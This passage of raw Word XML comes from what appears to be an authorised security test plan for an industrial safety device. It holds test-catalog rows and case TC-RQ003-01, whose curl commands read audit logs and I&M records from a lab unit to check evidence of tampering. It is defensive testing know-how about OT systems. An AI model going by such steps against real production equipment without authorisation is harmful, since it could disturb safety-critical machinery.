          <w:p w14:paraId="5D7454A8" w14:textId="43B6CA59" w:rsidR="00CA2AAB" w:rsidRPr="004E626E" w:rsidRDefault="00A3765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A3765F">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Proves G-2 (CR 2.11 unmet)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52E09CB4" w14:textId="4F1943EF" w:rsidR="00CA2AAB" w:rsidRPr="00E17F16" w:rsidRDefault="004701F7"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E17F16">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">NIST SP 800-115 §3.2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DE87FE8" w14:textId="427B2063" w:rsidR="00CA2AAB" w:rsidRPr="00E17F16" w:rsidRDefault="00DD4659"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E17F16">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA2AAB" w:rsidRPr="008171E4" w14:paraId="7152E6B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BCDBA36" w14:textId="77777777" w:rsidR="00CA2AAB" w:rsidRDefault="00CA2AAB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AFAB90D" w14:textId="77777777" w:rsidR="002E607F" w:rsidRPr="002E607F" w:rsidRDefault="00542D5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E607F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Attempt the production-gated FIT function (/fit/setfit, WO/P) on a production unit; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E6DA193" w14:textId="2FF1D164" w:rsidR="00CA2AAB" w:rsidRPr="00D1454A" w:rsidRDefault="00542D5F"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E607F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>confirm rejection and that the exclusion produces no log entry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EDC7D30" w14:textId="4403F39A" w:rsidR="00CA2AAB" w:rsidRPr="00542D5F" w:rsidRDefault="007A260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42D5F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Validates EDR 2.13 exclusion; confirms G-4 (no evidence)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AB774FF" w14:textId="77777777" w:rsidR="00E17F16" w:rsidRPr="00542D5F"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42D5F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">NIST SP 800-115 §4.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BBB6CC8" w14:textId="375032BE" w:rsidR="00CA2AAB" w:rsidRPr="00542D5F"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42D5F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>OWASP FSTM / ISTG-PHY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60492665" w14:textId="790ECA5C" w:rsidR="00CA2AAB" w:rsidRPr="00542D5F"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42D5F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54D60B44" w14:textId="77777777" w:rsidR="00CA2AAB" w:rsidRDefault="00CA2AAB" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D230D85" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44CAB2AF" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F35B7B8" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="3"/>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Two-Level Test Catalog</w:t>
      </w:r>
      <w:commentRangeEnd w:id="3"/>
      <w:r w:rsidR="009A4BFD">
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:commentReference w:id="3"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4750D64E" w14:textId="77777777" w:rsidR="009A4BFD" w:rsidRDefault="009A4BFD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FF31C96" w14:textId="6F376946" w:rsidR="009A4BFD" w:rsidRPr="00DB074F" w:rsidRDefault="009A4BFD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A4BFD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ003-01 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="009A4BFD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Baseline: What Evidence the Device Actually Collects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4642D3CE"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1D19DAC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CC46C1E" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66747783"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4271AE1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EA8CEA" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="582C9C36" w14:textId="1581397D" w:rsidR="00B73A1A" w:rsidRPr="00D1454A" w:rsidRDefault="0011600D"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11600D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ003-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="001604A0" w14:paraId="050543E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E308678"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46A36277" w14:textId="77065283" w:rsidR="00B73A1A" w:rsidRPr="00D1454A" w:rsidRDefault="00EB01F0"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EB01F0">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>RQ-003 (EHSR 1.1.9 §2) → CR 2.8 / CR 6.1 → Asset I</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00D67CA6" w14:paraId="3EA21A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60AB223" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5360AB8D" w14:textId="686A268D" w:rsidR="00B73A1A" w:rsidRPr="00D1454A" w:rsidRDefault="0063798F"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Repudiation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w14:paraId="1678006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BF127EE" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D95CA20" w14:textId="371043D8" w:rsidR="00B73A1A" w:rsidRPr="00D1454A" w:rsidRDefault="0063798F"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SVV-1 (Requirement-based Testing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00316EA1" w14:paraId="1169E5D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B4FE10" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E836295" w14:textId="3035D6AC" w:rsidR="00B73A1A" w:rsidRPr="00D1454A" w:rsidRDefault="00C868B0"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C868B0">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Establish which intervention-evidence mechanisms exist and are readable: the COM Error Log, the I&amp;M0 REVISION_COUNTER, and the I&amp;M4 parameter signature</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00C868B0">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>confirming CR 6.1 (readability) is met while characterising the content's limitations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00316EA1" w14:paraId="435DB82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6A43351" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7352362B" w14:textId="77777777" w:rsidR="007722F9" w:rsidRDefault="007722F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722F9">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Read the audit/error log and the I&amp;M records at a known-good baseline. 2. Perform one authorised parameter change. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="611E0142" w14:textId="77777777" w:rsidR="007722F9" w:rsidRDefault="007722F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722F9">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Re-read; confirm REVISION_COUNTER incremented and I&amp;M4 signature changed. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="045170B6" w14:textId="51DB321A" w:rsidR="00B73A1A" w:rsidRPr="00D1454A" w:rsidRDefault="007722F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722F9">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4. Inspect each record for the presence of identity and absolute timestamp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00316EA1" w14:paraId="3B9D12F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6DA4CC" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="711D69A3" w14:textId="77777777" w:rsidR="00EF7F75" w:rsidRDefault="00EF7F75"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EF7F75">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">PASS if the log and I&amp;M records are readable and the REVISION_COUNTER/I&amp;M4 reflect the change (CR 6.1 + partial CR 2.8 confirmed). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72582C01" w14:textId="56F787B1" w:rsidR="00B73A1A" w:rsidRPr="00D1454A" w:rsidRDefault="00EF7F75"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EF7F75">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Documented shortfall if no record carries a user identity or absolute timestamp (feeds CR 2.11/2.12 findings).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13EE0153" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRPr="00AF57B2" w:rsidRDefault="00B73A1A" w:rsidP="00B73A1A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CB59456"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764FEC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087026" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57C3318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140B906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205B2F" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B57029A" w14:textId="3AEF8DAC" w:rsidR="00B73A1A" w:rsidRPr="00D1454A" w:rsidRDefault="006E13AC"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E13AC">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ003-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00316EA1" w14:paraId="0725CB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AFC40B" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6400A0CD" w14:textId="5204BE01" w:rsidR="00B73A1A" w:rsidRPr="00D1454A" w:rsidRDefault="00BA522B"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522B">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">DUT 192.168.0.2; Pi mgmt eth1 = 192.168.50.10; browser 192.168.50.20; </w:t>
            </w:r>
            <w:r w:rsidRPr="00BA522B">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>F-Host on OT path</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00316EA1" w14:paraId="6F6C8AA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F3ADAB" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="307FB0A9" w14:textId="77777777" w:rsidR="000345CC" w:rsidRDefault="000345CC"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345CC">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">curl / IoT-Core visualizer; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="525A5B47" w14:textId="3C08966D" w:rsidR="00B73A1A" w:rsidRPr="00D1454A" w:rsidRDefault="000345CC"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345CC">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TIA Portal for the authorised change</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00316EA1" w14:paraId="7CF0657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21137E3" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C81DF4F" w14:textId="77777777" w:rsidR="00462F92" w:rsidRPr="00462F92"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2F92">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># TC-RQ003-01 Baseline evidence enumeration via IoT-Core</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D60B2A4" w14:textId="77777777" w:rsidR="00462F92" w:rsidRPr="00462F92"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2F92">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>curl -s http://192.168.0.2/devicestatus/errorlog/loglist -o TC01_log_base.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51B2085B" w14:textId="77777777" w:rsidR="00462F92" w:rsidRPr="00462F92"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2F92">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>curl -s http://192.168.0.2/deviceinfo/ -o TC01_iandm_base.json # incl. I&amp;M0 REVISION_COUNTER</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35F76F8A" w14:textId="77777777" w:rsidR="00462F92" w:rsidRPr="00462F92"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2F92">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>curl -s http://192.168.0.2/safecom/f_address -o TC01_faddr_base.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="707ECADC" w14:textId="77777777" w:rsidR="00462F92" w:rsidRPr="00462F92"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2F92">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># --- perform one authorised iPar change in TIA, download, then: ---</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B394FEF" w14:textId="77777777" w:rsidR="00462F92" w:rsidRPr="00611347"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611347">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>curl -s http://192.168.0.2/devicestatus/errorlog/loglist -o TC01_log_after.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70BC60F5" w14:textId="77777777" w:rsidR="00462F92" w:rsidRPr="00611347"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611347">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>curl -s http://192.168.0.2/deviceinfo/ -o TC01_iandm_after.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5999D0E9" w14:textId="05E08EBE" w:rsidR="00B73A1A" w:rsidRPr="00611347"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611347">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>diff TC01_iandm_base.json TC01_iandm_after.json | tee TC01_iandm_diff.txt # expect REVISION_COUNTER +1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00316EA1" w14:paraId="026342C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EC8E97" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2426DFC5" w14:textId="0201C1CE" w:rsidR="00B73A1A" w:rsidRPr="00D1454A" w:rsidRDefault="00462F92"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Pr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Readeable/ Revisio_counter increment/ No identity/timestamp event</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00FD6890" w14:paraId="12EB491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505F808" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="600257F0" w14:textId="77777777" w:rsidR="009B6AD1" w:rsidRDefault="009B6AD1" w:rsidP="009B6AD1">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1739"/>
              </w:tabs>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B6AD1">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">TC01_*.json, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4051352C" w14:textId="77777777" w:rsidR="009B6AD1" w:rsidRDefault="009B6AD1" w:rsidP="009B6AD1">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1739"/>
              </w:tabs>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B6AD1">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC01_iandm_diff.txt,</w:t>
            </w:r>
          </w:p>
